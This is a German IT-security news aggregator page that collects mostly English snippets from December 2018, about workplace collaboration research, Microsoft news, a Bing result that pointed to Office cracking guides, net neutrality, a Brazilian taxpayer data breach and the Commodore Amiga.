An anonymous reader quotes Inc: Our attention in the workplace is a precious resource that often falls victim to tools like email, Slack, and so on, which bring a nonstop supply of things to read, things to respond to, things to file, things to loop others in on, things to follow up on, and in general, things to do. This "always on" dynamic has roots in a desire for increased workplace collaboration and productivity, but as is so often the case, it turns out there is a balance to be struck for optimal results. New research shows that groups who collaborate less often may be better at problem solving.... In a study titled "How Intermittent Breaks in Interaction Improve Collective Intelligence", the authors use a standardized problem-solving test to measure the contrast between time spent in collaboration mode against the quality and quantity of problem solving results. The group with no interaction predictably had the highest options for solutions, but those solutions were of lower overall quality. The group with high interaction had higher quality solutions, but less variety and a lower likelihood to find the optimal solution. The intermittent collaboration groups found the desirable middle ground to balance out the pros/cons of the no interaction and high interaction groups, leading them to become the most successful problem solvers. The article warns of a "collaboration drain", suggesting managers pay closer attention to when collaboration is (and isn't) necessary. "Once upon a time in the land of business, people primarily communicated through conversations, meetings, and internally circulated printed memos. In the absence of email, Internet, cell phones, and CRMs there was a repeating cadence of connection, then disconnection, even while in the office." "In this case, 'disconnected' really amounts to uninterrupted -- and able to focus."

Read more of this story at Slashdot.


Newsbewertung

Weiterlesen

Microsoft: Neues Patent zu einem faltbaren Smartphone aufgetaucht

IT Security Nachrichten vom 15.12.2018 um 22:12 Uhr | Quelle winfuture.de
Microsoft, Patent, Faltbares Smartphone, foldable Obwohl Microsoft seit Anfang 2016 keine eigenen Smartphones mehr vorgestellt hat, ist eine Rückkehr in diesen Markt denkbar. Nun ist ein Patent aufgetaucht, welches ein Gerät mit zwei Displays sowie einem Scharnier zeigt. Womöglich könnte also ein Falt-Smartphone erscheinen. (Weiter lesen)
Newsbewertung

Weiterlesen

Ask Slashdot: Is There An Open Source Tool Measuring The Sharpness of Streaming Video?

IT Security Nachrichten vom 15.12.2018 um 21:34 Uhr | Quelle ask.slashdot.org
dryriver asks: Is there an open source video analysis tool available that can take a folder full of video captures (e.g. news, sports, movies, music videos, TV shows), analyze the video frames in those captures, and put a hard number on how optically sharp, on average, the digital video provided by any given digital TV or streaming service is? If such a tool exists, it could be of great use in shaming paid video content delivery services that promise proper "1080 HD" or "4K UHD" quality content, but deliver video that is actually Youtube quality or worse. With such a tool, people could channel-hop across their digital TV service's various offerings for an hour or so, capture the video stream to harddisk, and then have an "average optical sharpness score" for that service calculated that can be shared with others and published online, possibly shaming the content provider -- satellite TV providers in particular -- into upping their bitrate if the score turns out to be atrociously low for that service.... People in many countries -- particularly developing countries -- cough up hard cash to sign up for various satellite TV, digital TV, streaming video and similar services, only to then find that the bitrate, compression quality and optical sharpness of the video content delivered isn't too great at all. At a time when 4K UHD content is available in some countries, many satellite TV and streaming video services in many different countries do not even deliver properly sharp and well-defined 1080 HD video to their customers, even though the content quality advertised before signing up is very much "crystal clear 1080 HD High-Definition". What's the solution? Leave your thoughts and suggestions in the comments. And is there an open source tool measuring the sharpness of streaming video?

Read more of this story at Slashdot.


Newsbewertung

Weiterlesen

Microsoft Can Actually Teach You How to Crack Office 2019

IT Security Nachrichten vom 15.12.2018 um 21:09 Uhr | Quelle news.softpedia.com
Windows and Office are without a doubt two of the most pirated software products out there, and while you’d expect Microsoft to be very committed to stopping this, a recent blunder seems to suggest otherwise. Bing, Microsoft’s search engine that the software giant has deeply integrated into a series of other products, including Windows, makes it substantially easier for users to learn how to crack Office 2019. Because when searching for “office 2019 download,” the highlighted search result points to a website hosting the full instructions on how to get Microsoft’s latest Office productivity suite and activate it without having a genuine license. Furthermore, the instructions are detailed in a Bing search engine result card, so you can read most of them without actually going to the shady website. Search recommendation already removed? While it’s clearly unexpected for Microsoft to highlight such a result when searching for common keywords like “...
Newsbewertung

Weiterlesen

Microsoft Planning to Abandon Another Windows 10 Feature

IT Security Nachrichten vom 15.12.2018 um 20:47 Uhr | Quelle news.softpedia.com
Microsoft is getting ready to abandon another Windows 10 feature, mostly as the result of only a few people actually using it. This is what Twitter user Albacore, who has a good track on Windows scoops, says in a recent post, explaining that Microsoft is planning to ditch the People bar in Windows 10 19H1. While Microsoft hasn’t yet announced the change, a deprecation notification is projected to be introduced in a future Windows 10 19H1 preview build to be released to insiders in early 2019. “In upcoming 19H1 Insider builds, the People Bar will show a deprecation notice. It's a shame to see something like this with rather interesting engineering behind it kick the bucket,” the tweet reads. Windows 10 19H1 ready in spring of 2019 The People bar was introduced in Windows 10 as a neat way to add your favorite contacts to the taskbar in order to access apps for quick commu...
Newsbewertung

Weiterlesen

2018 – a year of data breaches in review

IT Security Nachrichten vom 15.12.2018 um 20:41 Uhr | Quelle reddit.com
2018 – a year of data breaches in review submitted by /u/RonaldvanderMeer
[link] [comments]

Newsbewertung

Weiterlesen

One Year After Net Neutrality Repeal, America's Democrats Warn 'The Fight Continues'

IT Security Nachrichten vom 15.12.2018 um 20:34 Uhr | Quelle yro.slashdot.org
CNET just published a fierce pro-net neutrality editorial co-authored by Nancy Pelosi, the soon-to-be Majority leader in the U.S. House of Representatives, with Mike Doyle, the expected Chairman of the House Subcommittee on Communications and Technology, and Frank Pallone, Jr. the expected Chairman of the House Energy and Commerce Committee. The three representatives argue that "the Trump FCC ignored millions of comments from Americans pleading to keep strong net neutrality rules in place." The FCC's net neutrality repeal left the market for broadband internet access virtually lawless, giving ISPs an opening to control peoples' online activities at their discretion. Gone are rules that required ISPs to treat all internet traffic equally. Gone are rules that prevented ISPs from speeding up traffic of some websites for a fee or punishing others by slowing their traffic down.... Without the FCC acting as sheriff, it is unfortunately not surprising that big corporations have started exploring ways to change how consumers access the Internet in order to benefit their bottom line.... Research from independent analysts shows that nearly every mobile ISP is throttling at least one streaming video service or using discriminatory boosting practices. Wireless providers are openly throttling video traffic and charging consumers extra for watching high-definition streams. ISPs have rolled out internet plans that favor companies they are affiliated with, despite full-page ads swearing they value net neutrality. And most concerning, an ISP was found throttling so-called "unlimited" plans for a fire department during wildfires in California. Make no mistake, these new practices are just ISPs sticking a toe in the water. Without an agency with the authority to investigate and punish unfair or discriminatory practices, ISPs will continue taking bolder and more blatantly anti-consumer steps. That is why we have fought over the past year to restore net neutrality rules and put a cop back on the ISP beat. In May, the U.S. Senate passed a bipartisan bill restoring net neutrality rules. Despite the support of a bipartisan majority of Americans, the Republican leadership of the U.S. House of Representatives refused our efforts to bring the bill to the floor for a vote. Fortunately, the time is fast coming when the people's voices will be heard. The editorial closes by arguing that "Large corporations will no longer be able to block progress on this important consumer protection issue."

Read more of this story at Slashdot.


Newsbewertung

Weiterlesen

Security Breach of Over 120 million Taxpayers in Brazil

IT Security Nachrichten vom 15.12.2018 um 20:11 Uhr | Quelle latesthackingnews.com

Recently, the Tax ID, better known as Cadastro de Pessoas Fisicas (CPF ID) consisting of over 120 million taxpayers in

Security Breach of Over 120 million Taxpayers in Brazil on Latest Hacking News.


Newsbewertung

Weiterlesen

Have a Safe Holiday Season To All Of You From Hackercombat.com

IT Security Nachrichten vom 15.12.2018 um 19:38 Uhr | Quelle hackercombat.com

The holiday season is considered as a season for giving, however, in the age of Information when data is considered wealth, all computer users especially corporate computer users should continue...

The post Have a Safe Holiday Season To All Of You From Hackercombat.com appeared first on .


Newsbewertung

Weiterlesen

Was Commodore's Amiga 'A Computer Ahead of Its Time'?

IT Security Nachrichten vom 15.12.2018 um 19:34 Uhr | Quelle slashdot.org
Long-time Slashdot reader Mike Bouma quotes Gizmodo: Despite being ahead of its time when it was unveiled in 1985, the Commodore Amiga didn't survive past 1996. The machine, which went up against with the likes of the IBM PC and the Macintosh, offered far superior hardware than its competitors. But it just wasn't enough, as this video from Ahoy's Stuart Brown explains. While the Amiga had other 16-bit computers beat on technology, it didn't really have anything compelling to do with that hardware. "With 4096 colours, 4 channels of digital audio, and preemptive multitasking, [the Amiga] was capable of incredible things for the time...." [U]nfortunately, internal struggles within Commodore would signal the beginning of the end. I'll always remember Joel Hodgson's Amiga joke on a 1991 episode of Mystery Science Theatre 3000. But in 2015 Geek.com reported on an Amiga which had been running a school's heating system for the last 30 years. A local high school student had originally set it up, and "he's the only one who knows how to fix software glitches. Luckily, he still lives in the area." Leave your own thoughts in the comments. Does anyone else have their own stories about Commodore's Amiga? And was the Amiga a computer ahead of its time?

Read more of this story at Slashdot.


Newsbewertung

Weiterlesen

Seitennavigation

Seite 11 von 3.117 Seiten (Bei Beitrag 350 - 385)
109.088x Beiträge in dieser Kategorie

Auf Seite 10 zurück | Nächste 12 Seite | Letzte Seite
[ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [11] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ]